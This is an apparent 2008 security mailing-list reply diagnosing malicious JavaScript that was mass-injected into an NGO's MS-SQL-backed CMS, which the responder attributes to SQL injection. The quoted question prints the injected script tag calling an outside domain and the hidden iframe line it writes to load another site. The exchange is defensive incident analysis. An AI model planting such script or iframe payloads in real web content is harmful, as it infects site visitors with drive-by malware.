Re: Mysterious JavaScript appearance in website database

["Bojan Zdrnja" <bojan.zdrnja () gmail com>]

Glenn,

On Tue, Apr 15, 2008 at 1:03 AM, Glenn Gillis
<glenn () elaw org test-google-a com> wrote:
> On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
>  U.S.-based NGO I work for mysteriously had a JavaScript URL appended to the
> titles of much of the content on our website:
>
>   <script src=http://www.nihaorr1.com/1.js></script>
>
>  NB: the last modified dates for all of the content containing a reference
> to this script are identical, right down the 1/100 second.
>
>  The contents of the script apparently attempts to open an iframe to a
>  non-existent domain, "nmidahena.com":
>
>   document.writeln("<iframe width=\'10\' height=\'1\'
>  src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");
>
>  I haven't found any reports of a new worm, etc. that might account for
> this, but when I Google "nmidahena.com" I get over 100,000 hits for
>  other sites on which this script is present.
>
>  We are running a custom-developed CMS with MS-SQL Server 2000 as the
> backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT
> Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes
> released prior to NT4's end-of-life declaration by MS, for what it's worth.)
>
>  Anyone have an idea what might have caused this?

It's almost certainly an SQL injection attack that inserted the line
of code above to all your HTML pages. These have become very common
lately.

I wrote a diary describing such an attack at
http://isc.sans.org/diary.html?storyid=3823

Cheers,

Bojan

-- 
Bojan Zdrnja, B.Sc.
CISSP/GCIA/GCIH
Senior Information Security Consultant

Infigo IS
http://www.infigo.hr